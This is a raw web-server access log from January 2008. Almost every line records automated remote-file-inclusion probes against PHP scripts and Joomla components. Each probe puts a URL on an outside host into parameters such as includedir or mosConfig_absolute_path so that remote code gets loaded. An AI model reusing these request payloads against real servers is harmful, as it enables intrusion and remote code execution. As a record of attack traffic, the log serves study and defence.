69.57.132.11 - - [03/Jan/2008:02:56:28 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:56:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:56:32 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:56:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:56:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:57:09 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:57:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:57:09 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.244.66 - - [03/Jan/2008:02:58:03 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [03/Jan/2008:02:58:03 -0800] "GET //skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [03/Jan/2008:02:58:03 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:58:34 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:58:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:58:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:58:42 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:58:42 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:58:42 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:58:42 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:58:42 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:02:58:42 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.244.66 - - [03/Jan/2008:02:59:05 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:59:22 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:59:23 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:02:59:23 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:59:40 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:59:40 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [03/Jan/2008:02:59:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:00 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:00 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:06 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:07 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:01:11 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:01:11 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:01:11 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:11 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:12 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:17 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:17 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:01:17 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:09 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:09 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:11 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:11 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:14 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:22 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:23 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:03:02:23 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:03:26 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:03:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:03:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:03:39 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:03:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [03/Jan/2008:03:03:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [03/Jan/2008:03:04:15 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [03/Jan/2008:03:04:16 -0800] "GET //skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [03/Jan/2008:03:04:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:04:36 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:04:36 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:04:36 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:04:43 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:04:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:04:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.76.110.169 - - [03/Jan/2008:03:05:48 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:06:31 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:06:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:06:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.117.17.226 - - [03/Jan/2008:03:06:34 -0800] "GET /logs/?mosConfig_absolute_path=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 200 28979 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.117.17.226 - - [03/Jan/2008:03:06:35 -0800] "GET /?mosConfig_absolute_path=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 200 2962 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
204.15.252.72 - - [03/Jan/2008:03:07:29 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.multiplan.pl/images/stories/appdata/groups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.20.28 - - [03/Jan/2008:03:08:25 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
59.106.20.28 - - [03/Jan/2008:03:08:26 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:03:08:39 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:03:08:39 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:08:42 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:08:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:03:08:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.57.99 - - [03/Jan/2008:03:09:09 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.230.57.99 - - [03/Jan/2008:03:09:09 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
204.15.252.72 - - [03/Jan/2008:03:10:02 -0800] "GET /logs/access_071220.log/Neos_Chronos/header.php?base_folder=http://www.multiplan.pl/images/stories/appdata/groups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [03/Jan/2008:03:10:02 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.multiplan.pl/images/stories/appdata/groups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [03/Jan/2008:03:10:02 -0800] "GET /logs/Neos_Chronos/header.php?base_folder=http://www.multiplan.pl/images/stories/appdata/groups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [03/Jan/2008:03:11:05 -0800] "GET /logs/access_071222.log/Neos_Chronos/header.php?base_folder=http://www.multiplan.pl/images/stories/appdata/groups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.4.99 - - [03/Jan/2008:03:11:34 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
91.121.4.99 - - [03/Jan/2008:03:11:34 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
205.234.252.183 - - [03/Jan/2008:03:12:21 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
205.234.252.183 - - [03/Jan/2008:03:12:22 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
207.157.58.25 - - [03/Jan/2008:03:13:29 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fantasyherald.com/creations/pics/help.jpg/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.157.58.25 - - [03/Jan/2008:03:13:29 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.fantasyherald.com/creations/pics/help.jpg/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
203.162.1.238 - - [03/Jan/2008:03:13:35 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.162.1.238 - - [03/Jan/2008:03:13:35 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
216.75.172.104 - - [03/Jan/2008:03:13:37 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
216.75.172.104 - - [03/Jan/2008:03:13:38 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.6.26.35 - - [03/Jan/2008:03:14:12 -0800] "GET /bikes/dteel/10MAR07/?M=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.98.78 - - [03/Jan/2008:03:16:24 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.ajir-sud.org/modules/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.78 - - [03/Jan/2008:03:16:26 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.ajir-sud.org/modules/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.78 - - [03/Jan/2008:03:16:33 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.ajir-sud.org/modules/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.78 - - [03/Jan/2008:03:16:34 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.ajir-sud.org/modules/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.23.34 - - [03/Jan/2008:03:19:01 -0800] "GET /config.php?path_to_root=http://www.kosca.net/bbs/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:21:18 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:21:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.137 - - [03/Jan/2008:03:21:19 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
